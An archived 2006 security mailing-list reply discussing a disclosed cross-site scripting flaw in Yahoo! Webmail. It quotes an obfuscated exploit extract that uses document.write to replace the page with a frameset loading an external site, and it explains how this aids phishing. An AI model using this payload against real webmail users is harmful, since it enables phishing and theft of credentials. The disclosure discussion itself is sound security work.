lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060418151857.84246.qmail@web54410.mail.yahoo.com>
Date: Tue Apr 18 16:19:04 2006
From: cesarc56 at yahoo.com (Cesar)
Subject: [Argeniss] Alert - Yahoo! Webmail XSS

I know what a Frame it's, but if I forget I know that
you will be there for remind me, thanks..

If you look at the extract of the exploit:
-----------------------------------
(java/**/script:document.write('<frameset cols=100%
rows=100% border=0 frameboarder=0framespacing=0><frame
frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

You can see that the whole HTML document is replaced
after the "document.write" and the frameset only
references a URL that is not under Yahoo! domain. This
means that all displayed content will be from an
external domain, I wonder if web browsers could do
something to alert about this and not just display the
external URL on the status bar. This default browser
behaviour makes phishing a lot easier.



Cesar.

--- Thierry Zoller <Thierry@...ler.lu> wrote:

> Dear Cesar Cesar,
> 
> 
> C> for a couple of seconds a weird URL, address bar
> C> didn't change (MS please change this behaviour!),
> but
> You know what a Frame is do you ? All browsers
> display the source of
> the html page in the URL bar, not the source of the
> frame(s).
> 
> -- 
> http://secdev.zoller.lu
> Thierry Zoller
> Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3
> 75DD 0AC6 F1C7
> 
> 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ